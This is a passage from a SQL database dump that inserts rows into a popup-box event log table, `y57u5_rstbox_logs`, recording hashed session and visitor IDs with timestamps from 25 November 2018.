(32083, '40dc3cdd71e34504972d957ac21f5b63', '66cd2ffd1b716f5a', 0, 2, 1, '2018-11-25 07:34:40'),
(32084, '40dc3cdd71e34504972d957ac21f5b63', '66cd2ffd1b716f5a', 0, 2, 1, '2018-11-25 07:34:46'),
(32085, '304b831876922c795bd46f506cfefc39', '67d9c3341cc72093', 0, 2, 1, '2018-11-25 07:35:00'),
(32086, '39b573c7da2f6e2ab2ec2a397ae98750', '3de88ff4581dab27', 0, 2, 1, '2018-11-25 07:36:29'),
(32087, '1d3125cc411976f885d186092acaba1c', '8cf1f4b8bd4cc593', 0, 2, 1, '2018-11-25 07:36:31'),
(32088, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 07:36:45'),
(32089, '2a974590c0a66f930d6081cadccb5880', '57587ada79ea2aa6', 0, 2, 1, '2018-11-25 07:36:51'),
(32090, 'ab21be33ca1433d38a2d548cdab2815e', 'f10990f26adcd1c5', 0, 2, 1, '2018-11-25 07:36:53'),
(32091, '46d23c7c3762ea9585e018b588b2b7dd', '9d7e91466402b84a', 0, 2, 1, '2018-11-25 07:37:13'),
(32092, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-25 07:37:13'),
(32093, 'ca94408925ef2345fac3e1a5f54ba32e', 'eee16e7a42491018', 0, 2, 1, '2018-11-25 07:37:21'),
(32094, 'c11fa2f31c55e3cb386034c2a5533408', '7501b42c35accff7', 0, 2, 1, '2018-11-25 07:37:21'),
(32095, 'c11fa2f31c55e3cb386034c2a5533408', '7501b42c35accff7', 0, 2, 1, '2018-11-25 07:38:09'),
(32096, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-25 07:38:52'),
(32097, 'ab21be33ca1433d38a2d548cdab2815e', 'f10990f26adcd1c5', 0, 2, 1, '2018-11-25 07:39:00'),
(32098, '962b66651e103e2f1fa9c7e31c09a287', '4c07673592205f17', 0, 2, 1, '2018-11-25 07:40:37'),
(32099, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-25 07:40:43'),
(32100, '0cc0f219ef7d2116761fc957537c9736', '37c6d85bc2eb625e', 0, 2, 1, '2018-11-25 07:41:18'),
(32101, '5f9b4e6f8bedd038474a0620450e74b9', 'b9974a919762d897', 0, 2, 1, '2018-11-25 07:43:46'),
(32102, 'a565aa3c2e208b700bef2fa3592061f1', '94526f1094c8a3e4', 0, 2, 1, '2018-11-25 07:44:18'),
(32103, 'eda403ce750060eb09c1d3dc2ef43851', 'b335903010e84d54', 0, 2, 1, '2018-11-25 07:44:50'),
(32104, 'b1562d3f37e05cd6b109fe8f081218d6', '31e5aab61ec6096e', 0, 2, 1, '2018-11-25 07:44:56'),
(32105, 'eda403ce750060eb09c1d3dc2ef43851', 'b335903010e84d54', 0, 2, 1, '2018-11-25 07:45:08'),
(32106, 'b1562d3f37e05cd6b109fe8f081218d6', '31e5aab61ec6096e', 0, 2, 1, '2018-11-25 07:45:11'),
(32107, 'c4ad5b74026b0183a579baf6733a212d', 'f19010d8a5f137d0', 0, 2, 1, '2018-11-25 07:45:13'),
(32108, '7840fb1088de1c809e6f748a0dca0377', 'c17a2ac85cf3ae67', 0, 2, 1, '2018-11-25 07:45:20'),
(32109, 'eda403ce750060eb09c1d3dc2ef43851', 'b335903010e84d54', 0, 2, 1, '2018-11-25 07:45:38'),
(32110, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-25 07:45:47'),
(32111, '9c50e00170dd35261b54872f3303ca3d', '4a9bbb053e611d1d', 0, 2, 1, '2018-11-25 07:45:58'),
(32112, 'd186503e0f98cbb1384478fa1a483602', 'f5f5c525cd3a4574', 0, 2, 1, '2018-11-25 07:46:51'),
(32113, 'f27d376ce6f1cc910d3f43261df7c9fa', '9ba236bb36f86506', 0, 2, 1, '2018-11-25 07:47:21'),
(32114, '8ac7abc1a39e8f7c8dc5fb34b1c2b86a', 'df830820ccabeec3', 0, 2, 1, '2018-11-25 07:47:35'),
(32115, 'c11fa2f31c55e3cb386034c2a5533408', '7501b42c35accff7', 0, 2, 1, '2018-11-25 07:47:43'),
(32116, '7de72b09f2598d5f0e6d619b8282f0c9', '66cd2ffd1b716f5a', 0, 2, 1, '2018-11-25 07:47:43'),
(32117, 'cd57e7dd3162b13cb63921dee3b494fe', 'c0d620ee8725a926', 0, 2, 1, '2018-11-25 07:47:51'),
(32118, 'b1562d3f37e05cd6b109fe8f081218d6', '31e5aab61ec6096e', 0, 2, 1, '2018-11-25 07:48:04'),
(32119, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-25 07:48:09'),
(32120, '962b66651e103e2f1fa9c7e31c09a287', '4c07673592205f17', 0, 2, 1, '2018-11-25 07:48:15'),
(32121, 'd186503e0f98cbb1384478fa1a483602', 'f5f5c525cd3a4574', 0, 2, 1, '2018-11-25 07:48:18'),
(32122, 'c11fa2f31c55e3cb386034c2a5533408', '7501b42c35accff7', 0, 2, 1, '2018-11-25 07:48:20'),
(32123, 'bbc57b24f664bc11e28371bac724f8b1', 'a02a3c80cccf2b95', 0, 2, 1, '2018-11-25 07:48:23'),
(32124, '7de72b09f2598d5f0e6d619b8282f0c9', '66cd2ffd1b716f5a', 0, 2, 1, '2018-11-25 07:48:37'),
(32125, '962b66651e103e2f1fa9c7e31c09a287', '4c07673592205f17', 0, 2, 1, '2018-11-25 07:48:38'),
(32126, '8ac7abc1a39e8f7c8dc5fb34b1c2b86a', 'df830820ccabeec3', 0, 2, 1, '2018-11-25 07:48:39'),
(32127, 'ea3346d0ac4725ed624cda1488ed0937', '5d05c790f4830fad', 0, 2, 1, '2018-11-25 07:49:09'),
(32128, '39c15d34d72225221f32a95c69710f05', 'c98a517fb6191f41', 0, 2, 1, '2018-11-25 07:49:10'),
(32129, '664dae76081a5d5a3ce3b0d246808cbe', 'df27b9a2919a8206', 0, 2, 1, '2018-11-25 07:49:11'),
(32130, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-25 07:49:32'),
(32131, '2a974590c0a66f930d6081cadccb5880', '57587ada79ea2aa6', 0, 2, 1, '2018-11-25 07:49:55'),
(32132, '2cc2218c82f1079f2878c9b6bc1863a9', 'e216e7808556cb4e', 0, 2, 1, '2018-11-25 07:49:59'),
(32133, '9c50e00170dd35261b54872f3303ca3d', '4a9bbb053e611d1d', 0, 2, 1, '2018-11-25 07:50:09'),
(32134, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-25 07:50:22'),
(32135, '8ab1d56ad4f2a3b0a4e6989061d01b11', '9113ca554f25f876', 0, 2, 1, '2018-11-25 07:50:28'),
(32136, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 07:50:50'),
(32137, 'e6971961235d26337a3084f699c599eb', 'cd739182be9070e6', 0, 2, 1, '2018-11-25 07:51:12'),
(32138, '8ab1d56ad4f2a3b0a4e6989061d01b11', '9113ca554f25f876', 0, 2, 1, '2018-11-25 07:51:17'),
(32139, 'a8c503aeb35c91a3dd2155b3248af2a2', 'fcbedf79e4ce4390', 0, 2, 1, '2018-11-25 07:52:11'),
(32140, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-25 07:53:00'),
(32141, '962b66651e103e2f1fa9c7e31c09a287', '4c07673592205f17', 0, 2, 1, '2018-11-25 07:53:00'),
(32142, 'b1562d3f37e05cd6b109fe8f081218d6', '31e5aab61ec6096e', 0, 2, 1, '2018-11-25 07:53:43'),
(32143, '4d636dd564e2c5180c3c7e89db50ac2e', '46713cac27a94b83', 0, 2, 1, '2018-11-25 07:54:08'),
(32144, 'b1562d3f37e05cd6b109fe8f081218d6', '31e5aab61ec6096e', 0, 2, 1, '2018-11-25 07:55:44'),
(32145, 'a8c503aeb35c91a3dd2155b3248af2a2', 'fcbedf79e4ce4390', 0, 2, 1, '2018-11-25 07:56:48'),
(32146, '4eee4ac53d1843519b3e44d159167854', '5b2037467d58dd67', 0, 2, 1, '2018-11-25 07:57:15'),
(32147, '2c9e432af3e30699dbe260fd08f7c277', '46a1385d0bfcd988', 0, 2, 1, '2018-11-25 07:57:20'),
(32148, 'f4de1585bb15df34abb9d8b3e60ae0c6', 'e0d31f0a24a43cd7', 0, 2, 1, '2018-11-25 07:57:23'),
(32149, 'f4de1585bb15df34abb9d8b3e60ae0c6', 'e0d31f0a24a43cd7', 0, 2, 1, '2018-11-25 07:57:35'),
(32150, 'cd57e7dd3162b13cb63921dee3b494fe', 'c0d620ee8725a926', 0, 2, 1, '2018-11-25 07:58:54'),
(32151, '7301005dec8bbeda473655480e02e97d', 'e0d31f0a24a43cd7', 0, 2, 1, '2018-11-25 07:59:02'),
(32152, 'b1562d3f37e05cd6b109fe8f081218d6', '31e5aab61ec6096e', 0, 2, 1, '2018-11-25 07:59:30'),
(32153, 'e30020caef1bc993cc73d2c41e0e2d0b', '36146e1f6045b395', 0, 2, 1, '2018-11-25 08:00:26'),
(32154, 'e30020caef1bc993cc73d2c41e0e2d0b', '36146e1f6045b395', 0, 2, 1, '2018-11-25 08:00:38'),
(32155, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-25 08:01:05'),
(32156, '39c15d34d72225221f32a95c69710f05', 'c98a517fb6191f41', 0, 2, 1, '2018-11-25 08:01:09'),
(32157, '2a974590c0a66f930d6081cadccb5880', '57587ada79ea2aa6', 0, 2, 1, '2018-11-25 08:01:19'),
(32158, '68f454eced809600bf251e23ef340422', '1ff470164e5e99af', 0, 2, 1, '2018-11-25 08:01:35'),
(32159, '0248b99dce48d21fd0a30047abe85514', '4c07673592205f17', 0, 2, 1, '2018-11-25 08:01:51'),
(32160, 'cd57e7dd3162b13cb63921dee3b494fe', 'c0d620ee8725a926', 0, 2, 1, '2018-11-25 08:02:01'),
(32161, '2b1084ecb19b8d354618aa70ed173c7e', '3a681ce2bd8cc6dd', 0, 2, 1, '2018-11-25 08:02:09'),
(32162, '7301005dec8bbeda473655480e02e97d', 'e0d31f0a24a43cd7', 0, 2, 1, '2018-11-25 08:02:26'),
(32163, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-25 08:02:35'),
(32164, '85a0f8daddcfe02a24bac6ff3627acf7', '6092d6c1cb041b23', 0, 2, 1, '2018-11-25 08:02:38'),
(32165, '7301005dec8bbeda473655480e02e97d', 'e0d31f0a24a43cd7', 0, 2, 1, '2018-11-25 08:02:44'),
(32166, '7301005dec8bbeda473655480e02e97d', 'e0d31f0a24a43cd7', 0, 2, 1, '2018-11-25 08:03:01'),
(32167, '85a0f8daddcfe02a24bac6ff3627acf7', '6092d6c1cb041b23', 0, 2, 1, '2018-11-25 08:03:02'),
(32168, '9c50e00170dd35261b54872f3303ca3d', '4a9bbb053e611d1d', 0, 2, 1, '2018-11-25 08:03:23'),
(32169, '7301005dec8bbeda473655480e02e97d', 'e0d31f0a24a43cd7', 0, 2, 1, '2018-11-25 08:03:52'),
(32170, '7bc4d7e4ffe272fea838d2a6c3fdfa3d', '6092d6c1cb041b23', 0, 2, 1, '2018-11-25 08:04:00'),
(32171, '7301005dec8bbeda473655480e02e97d', 'e0d31f0a24a43cd7', 0, 2, 1, '2018-11-25 08:04:04'),
(32172, '8708fdbcc8ec2510f3a1e4ef735a3243', '14cb28e263fc2409', 0, 2, 1, '2018-11-25 08:04:05'),
(32173, 'b1562d3f37e05cd6b109fe8f081218d6', '31e5aab61ec6096e', 0, 2, 1, '2018-11-25 08:05:06'),
(32174, '2b1084ecb19b8d354618aa70ed173c7e', '3a681ce2bd8cc6dd', 0, 2, 1, '2018-11-25 08:05:38'),
(32175, 'f63838b06cd145255cf0818a4b0eaa22', '44451e386b316e7c', 0, 2, 1, '2018-11-25 08:06:52'),
(32176, '7301005dec8bbeda473655480e02e97d', 'e0d31f0a24a43cd7', 0, 2, 1, '2018-11-25 08:07:14'),
(32177, '7301005dec8bbeda473655480e02e97d', 'e0d31f0a24a43cd7', 0, 2, 1, '2018-11-25 08:07:22'),
(32178, 'bd183ee772ddee45da4eaae456529577', '369d35f0f038a7d5', 0, 2, 1, '2018-11-25 08:07:30'),
(32179, '73240ddaa16bcd60c9b4181a01b0eb91', '575b738595cdb2f5', 0, 2, 1, '2018-11-25 08:09:34'),
(32180, 'bd183ee772ddee45da4eaae456529577', '369d35f0f038a7d5', 0, 2, 1, '2018-11-25 08:09:44'),
(32181, '5a489caa74421001eb62ac73ffea1069', '4fa83dd66d754b91', 0, 2, 1, '2018-11-25 08:09:51'),
(32182, '5a489caa74421001eb62ac73ffea1069', '4fa83dd66d754b91', 0, 2, 1, '2018-11-25 08:10:40'),
(32183, '5a489caa74421001eb62ac73ffea1069', '4fa83dd66d754b91', 0, 2, 1, '2018-11-25 08:11:06'),
(32184, '7709263ed63e93e3f615e8bad057cf95', '00cfdd65313a346b', 0, 2, 1, '2018-11-25 08:11:27'),
(32185, 'a8a8f9e20869eeab581b123c0bc5740e', 'df16f196acf32371', 0, 2, 1, '2018-11-25 08:13:08'),
(32186, '7de72b09f2598d5f0e6d619b8282f0c9', '66cd2ffd1b716f5a', 0, 2, 1, '2018-11-25 08:13:11'),
(32187, 'cd57e7dd3162b13cb63921dee3b494fe', 'c0d620ee8725a926', 0, 2, 1, '2018-11-25 08:13:22'),
(32188, 'bd183ee772ddee45da4eaae456529577', '369d35f0f038a7d5', 0, 2, 1, '2018-11-25 08:13:44'),
(32189, '2b04040eef8e036730133aee2a45feb7', 'c82195f7827b9487', 0, 2, 1, '2018-11-25 08:14:02'),
(32190, 'bd183ee772ddee45da4eaae456529577', '369d35f0f038a7d5', 0, 2, 1, '2018-11-25 08:14:58'),
(32191, '7de72b09f2598d5f0e6d619b8282f0c9', '66cd2ffd1b716f5a', 0, 2, 1, '2018-11-25 08:15:05'),
(32192, 'f63838b06cd145255cf0818a4b0eaa22', '44451e386b316e7c', 0, 2, 1, '2018-11-25 08:15:13'),
(32193, 'cd57e7dd3162b13cb63921dee3b494fe', 'c0d620ee8725a926', 0, 2, 1, '2018-11-25 08:15:24'),
(32194, 'df559e083ffe46e6d0199cc493ab7f48', '5ff50e247bff9b98', 0, 2, 1, '2018-11-25 08:16:09'),
(32195, '06a5ff2933b145bd5340bd2ab6e79733', 'fbf0576065758144', 0, 2, 1, '2018-11-25 08:16:36'),
(32196, 'f63838b06cd145255cf0818a4b0eaa22', '44451e386b316e7c', 0, 2, 1, '2018-11-25 08:19:21'),
(32197, 'df559e083ffe46e6d0199cc493ab7f48', '5ff50e247bff9b98', 0, 2, 1, '2018-11-25 08:21:06'),
(32198, '814cd62f47797504e28b952a5460fac9', '44451e386b316e7c', 0, 2, 1, '2018-11-25 08:21:17'),
(32199, '5bac11b7736048ae3c5c21b3ed10101b', '81813d0a0d1e159b', 0, 2, 1, '2018-11-25 08:21:27'),
(32200, '5bac11b7736048ae3c5c21b3ed10101b', '81813d0a0d1e159b', 0, 2, 1, '2018-11-25 08:21:40'),
(32201, 'f3e01c63db412d29a5c73e7bc3a4fcad', '75c5757dbc277dd4', 0, 2, 1, '2018-11-25 08:22:29'),
(32202, 'f3e01c63db412d29a5c73e7bc3a4fcad', '75c5757dbc277dd4', 0, 2, 1, '2018-11-25 08:22:59'),
(32203, '39b573c7da2f6e2ab2ec2a397ae98750', '3de88ff4581dab27', 0, 2, 1, '2018-11-25 08:23:54'),
(32204, '39b573c7da2f6e2ab2ec2a397ae98750', '3de88ff4581dab27', 0, 2, 1, '2018-11-25 08:24:02'),
(32205, '852d33d2fc197b86f4219d7e7df30c25', '6e117bd555667400', 0, 2, 1, '2018-11-25 08:24:27'),
(32206, '60fe79c160b1bd1e423f2b0874f34847', '6f9a45eaea213844', 0, 2, 1, '2018-11-25 08:25:30'),
(32207, 'd3ff7a94651f379e99858dbaf031c380', 'fc794f0a80972404', 0, 2, 1, '2018-11-25 08:27:04'),
(32208, 'd3ff7a94651f379e99858dbaf031c380', 'fc794f0a80972404', 0, 2, 1, '2018-11-25 08:27:18'),
(32209, 'f3e01c63db412d29a5c73e7bc3a4fcad', '75c5757dbc277dd4', 0, 2, 1, '2018-11-25 08:27:57'),
(32210, 'f3e01c63db412d29a5c73e7bc3a4fcad', '75c5757dbc277dd4', 0, 2, 1, '2018-11-25 08:28:02'),
(32211, '60fe79c160b1bd1e423f2b0874f34847', '6f9a45eaea213844', 0, 2, 1, '2018-11-25 08:28:19'),
(32212, 'e0819d0affb6a2c52d8c6e014caea061', '9f7ed6e01dc25bec', 0, 2, 1, '2018-11-25 08:30:56'),
(32213, 'e0819d0affb6a2c52d8c6e014caea061', '9f7ed6e01dc25bec', 0, 2, 1, '2018-11-25 08:31:13'),
(32214, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 08:32:28'),
(32215, '1ce726344b4c0c856056849a73aa756e', '19ac418837a1bfb6', 0, 2, 1, '2018-11-25 08:33:40'),
(32216, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 08:34:16'),
(32217, 'c11fa2f31c55e3cb386034c2a5533408', '7501b42c35accff7', 0, 2, 1, '2018-11-25 08:36:29'),
(32218, 'e5f13f1c9f933d2073e8a72bd1dee743', '4497700c55bcbfe5', 0, 2, 1, '2018-11-25 08:37:20'),
(32219, '5f9b4e6f8bedd038474a0620450e74b9', 'b9974a919762d897', 0, 2, 1, '2018-11-25 08:37:28'),
(32220, 'd8b45ad286ae697671d5c47971c44546', 'de9b8e6bc6e762ed', 0, 2, 1, '2018-11-25 08:39:00'),
(32221, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 08:39:14'),
(32222, '664dae76081a5d5a3ce3b0d246808cbe', 'df27b9a2919a8206', 0, 2, 1, '2018-11-25 08:39:15'),
(32223, '664dae76081a5d5a3ce3b0d246808cbe', 'df27b9a2919a8206', 0, 2, 1, '2018-11-25 08:39:20'),
(32224, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-25 08:39:26'),
(32225, 'e676ac11918feb1dd403f5dba9a5b901', 'cd809b8cde078906', 0, 2, 1, '2018-11-25 08:39:33'),
(32226, 'dbc74d899424520f1bf118dc22060d07', '76ed9cbc7a5d0626', 0, 2, 1, '2018-11-25 08:39:42'),
(32227, '2cc2218c82f1079f2878c9b6bc1863a9', 'e216e7808556cb4e', 0, 2, 1, '2018-11-25 08:39:56'),
(32228, 'dbc74d899424520f1bf118dc22060d07', '76ed9cbc7a5d0626', 0, 2, 1, '2018-11-25 08:40:06'),
(32229, 'e6971961235d26337a3084f699c599eb', 'cd739182be9070e6', 0, 2, 1, '2018-11-25 08:40:09'),
(32230, '664dae76081a5d5a3ce3b0d246808cbe', 'df27b9a2919a8206', 0, 2, 1, '2018-11-25 08:40:16'),
(32231, 'e676ac11918feb1dd403f5dba9a5b901', 'cd809b8cde078906', 0, 2, 1, '2018-11-25 08:40:27'),
(32232, 'e6971961235d26337a3084f699c599eb', 'cd739182be9070e6', 0, 2, 1, '2018-11-25 08:40:55'),
(32233, '5a4ddee97ffd4896887baf36d01887c5', '049dbeed11095c77', 0, 2, 1, '2018-11-25 08:41:10'),
(32234, '2a974590c0a66f930d6081cadccb5880', '57587ada79ea2aa6', 0, 2, 1, '2018-11-25 08:41:12'),
(32235, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-25 08:41:17'),
(32236, '5a4ddee97ffd4896887baf36d01887c5', '049dbeed11095c77', 0, 2, 1, '2018-11-25 08:42:31'),
(32237, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-25 08:42:42'),
(32238, '60fe79c160b1bd1e423f2b0874f34847', '6f9a45eaea213844', 0, 2, 1, '2018-11-25 08:42:55'),
(32239, 'c11fa2f31c55e3cb386034c2a5533408', '7501b42c35accff7', 0, 2, 1, '2018-11-25 08:44:09'),
(32240, 'd8b45ad286ae697671d5c47971c44546', 'de9b8e6bc6e762ed', 0, 2, 1, '2018-11-25 08:45:00'),
(32241, 'd3ff7a94651f379e99858dbaf031c380', 'fc794f0a80972404', 0, 2, 1, '2018-11-25 08:45:04'),
(32242, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-25 08:45:16'),
(32243, 'b1562d3f37e05cd6b109fe8f081218d6', '31e5aab61ec6096e', 0, 2, 1, '2018-11-25 08:45:40'),
(32244, 'd8b45ad286ae697671d5c47971c44546', 'de9b8e6bc6e762ed', 0, 2, 1, '2018-11-25 08:45:41'),
(32245, 'e6971961235d26337a3084f699c599eb', 'cd739182be9070e6', 0, 2, 1, '2018-11-25 08:45:44'),
(32246, 'f79c354b7185891ea2a1ae619cb7e3e1', 'da8cf8a61fa6af28', 0, 2, 1, '2018-11-25 08:46:01'),
(32247, 'f79c354b7185891ea2a1ae619cb7e3e1', 'da8cf8a61fa6af28', 0, 2, 1, '2018-11-25 08:46:17'),
(32248, '703acff1d83f5c5100d86da55dc41465', '101317224b4423da', 0, 2, 1, '2018-11-25 08:46:27'),
(32249, 'd8b45ad286ae697671d5c47971c44546', 'de9b8e6bc6e762ed', 0, 2, 1, '2018-11-25 08:46:31'),
(32250, '00dc5b237dbd1ff36d24642f6df05ef2', '10d9000ca676314c', 0, 2, 1, '2018-11-25 08:46:33'),
(32251, 'bbc57b24f664bc11e28371bac724f8b1', 'a02a3c80cccf2b95', 0, 2, 1, '2018-11-25 08:46:56'),
(32252, '852d33d2fc197b86f4219d7e7df30c25', '6e117bd555667400', 0, 2, 1, '2018-11-25 08:46:59');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(32253, '0248b99dce48d21fd0a30047abe85514', '4c07673592205f17', 0, 2, 1, '2018-11-25 08:47:00'),
(32254, '5a4ddee97ffd4896887baf36d01887c5', '049dbeed11095c77', 0, 2, 1, '2018-11-25 08:47:00'),
(32255, 'd8b45ad286ae697671d5c47971c44546', 'de9b8e6bc6e762ed', 0, 2, 1, '2018-11-25 08:47:07'),
(32256, '0248b99dce48d21fd0a30047abe85514', '4c07673592205f17', 0, 2, 1, '2018-11-25 08:47:08'),
(32257, '5a4ddee97ffd4896887baf36d01887c5', '049dbeed11095c77', 0, 2, 1, '2018-11-25 08:47:10'),
(32258, '2a974590c0a66f930d6081cadccb5880', '57587ada79ea2aa6', 0, 2, 1, '2018-11-25 08:47:17'),
(32259, '814cd62f47797504e28b952a5460fac9', '44451e386b316e7c', 0, 2, 1, '2018-11-25 08:47:17'),
(32260, 'e30020caef1bc993cc73d2c41e0e2d0b', '36146e1f6045b395', 0, 2, 1, '2018-11-25 08:47:28'),
(32261, 'bbc57b24f664bc11e28371bac724f8b1', 'a02a3c80cccf2b95', 0, 2, 1, '2018-11-25 08:47:32'),
(32262, 'ec0ba2ed06e81d60648a4a8c07dc1ece', '52bbcfcf9536a4a7', 0, 2, 1, '2018-11-25 08:47:33'),
(32263, '5a4ddee97ffd4896887baf36d01887c5', '049dbeed11095c77', 0, 2, 1, '2018-11-25 08:47:37'),
(32264, 'c11fa2f31c55e3cb386034c2a5533408', '7501b42c35accff7', 0, 2, 1, '2018-11-25 08:47:40'),
(32265, 'f79c354b7185891ea2a1ae619cb7e3e1', 'da8cf8a61fa6af28', 0, 2, 1, '2018-11-25 08:47:41'),
(32266, '2a974590c0a66f930d6081cadccb5880', '57587ada79ea2aa6', 0, 2, 1, '2018-11-25 08:47:43'),
(32267, '852d33d2fc197b86f4219d7e7df30c25', '6e117bd555667400', 0, 2, 1, '2018-11-25 08:47:50'),
(32268, 'f79c354b7185891ea2a1ae619cb7e3e1', 'da8cf8a61fa6af28', 0, 2, 1, '2018-11-25 08:47:52'),
(32269, '1315991e57d074f1f6310d887a40b173', 'e60d112ee1b24180', 0, 2, 1, '2018-11-25 08:47:53'),
(32270, '266dd6d7c3903c4f935f4c089da26257', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 08:47:56'),
(32271, 'f79c354b7185891ea2a1ae619cb7e3e1', 'da8cf8a61fa6af28', 0, 2, 1, '2018-11-25 08:47:59'),
(32272, '0248b99dce48d21fd0a30047abe85514', '4c07673592205f17', 0, 2, 1, '2018-11-25 08:48:05'),
(32273, '1315991e57d074f1f6310d887a40b173', 'e60d112ee1b24180', 0, 2, 1, '2018-11-25 08:48:28'),
(32274, '081bcde98e6ca2f143197a84dd85c593', '9dcde50e1da11f69', 0, 2, 1, '2018-11-25 08:48:31'),
(32275, '703acff1d83f5c5100d86da55dc41465', '101317224b4423da', 0, 2, 1, '2018-11-25 08:48:38'),
(32276, 'b1562d3f37e05cd6b109fe8f081218d6', '31e5aab61ec6096e', 0, 2, 1, '2018-11-25 08:48:41'),
(32277, '40ead395e300bfc4066d320920aa2396', '32568c6c3dd8ec11', 0, 2, 1, '2018-11-25 08:48:49'),
(32278, '2cc2218c82f1079f2878c9b6bc1863a9', 'e216e7808556cb4e', 0, 2, 1, '2018-11-25 08:48:53'),
(32279, '664dae76081a5d5a3ce3b0d246808cbe', 'df27b9a2919a8206', 0, 2, 1, '2018-11-25 08:49:02'),
(32280, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-25 08:49:03'),
(32281, '40ead395e300bfc4066d320920aa2396', '32568c6c3dd8ec11', 0, 2, 1, '2018-11-25 08:49:08'),
(32282, '54e6f5ef533ce01d0bfe56ef6cf4912f', '3a681ce2bd8cc6dd', 0, 2, 1, '2018-11-25 08:49:39'),
(32283, '1315991e57d074f1f6310d887a40b173', 'e60d112ee1b24180', 0, 2, 1, '2018-11-25 08:49:53'),
(32284, '54e6f5ef533ce01d0bfe56ef6cf4912f', '3a681ce2bd8cc6dd', 0, 2, 1, '2018-11-25 08:49:54'),
(32285, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 08:50:34'),
(32286, 'a565aa3c2e208b700bef2fa3592061f1', '94526f1094c8a3e4', 0, 2, 1, '2018-11-25 08:50:37'),
(32287, 'e676ac11918feb1dd403f5dba9a5b901', 'cd809b8cde078906', 0, 2, 1, '2018-11-25 08:50:42'),
(32288, 'bbc57b24f664bc11e28371bac724f8b1', 'a02a3c80cccf2b95', 0, 2, 1, '2018-11-25 08:50:52'),
(32289, '2a974590c0a66f930d6081cadccb5880', '57587ada79ea2aa6', 0, 2, 1, '2018-11-25 08:50:53'),
(32290, '58d43130e4fe4413d1b7a89b427abafe', '8a144e5fc2e94311', 0, 2, 1, '2018-11-25 08:51:21'),
(32291, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-25 08:51:24'),
(32292, '2079abf99bb09e8818114bf9d35aa315', '03656dd438efd1a5', 0, 2, 1, '2018-11-25 08:51:44'),
(32293, '2079abf99bb09e8818114bf9d35aa315', '03656dd438efd1a5', 0, 2, 1, '2018-11-25 08:52:41'),
(32294, '081bcde98e6ca2f143197a84dd85c593', '9dcde50e1da11f69', 0, 2, 1, '2018-11-25 08:52:53'),
(32295, '2b04040eef8e036730133aee2a45feb7', 'c82195f7827b9487', 0, 2, 1, '2018-11-25 08:53:21'),
(32296, 'e6971961235d26337a3084f699c599eb', 'cd739182be9070e6', 0, 2, 1, '2018-11-25 08:53:22'),
(32297, '40ead395e300bfc4066d320920aa2396', '32568c6c3dd8ec11', 0, 2, 1, '2018-11-25 08:53:25'),
(32298, '1c0bb9cc2d20e735732e707b39cba636', '2b9f3816f683545a', 0, 2, 1, '2018-11-25 08:53:26'),
(32299, '2abce443dda1e175287f91ab1c9f154b', 'dee0189c9a93ff94', 0, 2, 1, '2018-11-25 08:53:32'),
(32300, '1c0bb9cc2d20e735732e707b39cba636', '2b9f3816f683545a', 0, 2, 1, '2018-11-25 08:53:34'),
(32301, 'ca94408925ef2345fac3e1a5f54ba32e', 'eee16e7a42491018', 0, 2, 1, '2018-11-25 08:53:39'),
(32302, 'f4ad2897ce1eee5c93ffb6cbf6389388', '93f30eaefda9d8c4', 0, 2, 1, '2018-11-25 08:53:41'),
(32303, '00dc5b237dbd1ff36d24642f6df05ef2', '10d9000ca676314c', 0, 2, 1, '2018-11-25 08:53:49'),
(32304, '081bcde98e6ca2f143197a84dd85c593', '9dcde50e1da11f69', 0, 2, 1, '2018-11-25 08:54:52'),
(32305, '081bcde98e6ca2f143197a84dd85c593', '9dcde50e1da11f69', 0, 2, 1, '2018-11-25 08:55:20'),
(32306, '2a974590c0a66f930d6081cadccb5880', '57587ada79ea2aa6', 0, 2, 1, '2018-11-25 08:56:15'),
(32307, 'e6971961235d26337a3084f699c599eb', 'cd739182be9070e6', 0, 2, 1, '2018-11-25 08:56:23'),
(32308, 'e6971961235d26337a3084f699c599eb', 'cd739182be9070e6', 0, 2, 1, '2018-11-25 08:57:05'),
(32309, '805db7ea876cd8d817fc8ef71d24e445', '7fbc28142a4b55b4', 0, 2, 1, '2018-11-25 08:57:16'),
(32310, 'c11fa2f31c55e3cb386034c2a5533408', '7501b42c35accff7', 0, 2, 1, '2018-11-25 08:57:31'),
(32311, '54e6f5ef533ce01d0bfe56ef6cf4912f', '3a681ce2bd8cc6dd', 0, 2, 1, '2018-11-25 08:57:35'),
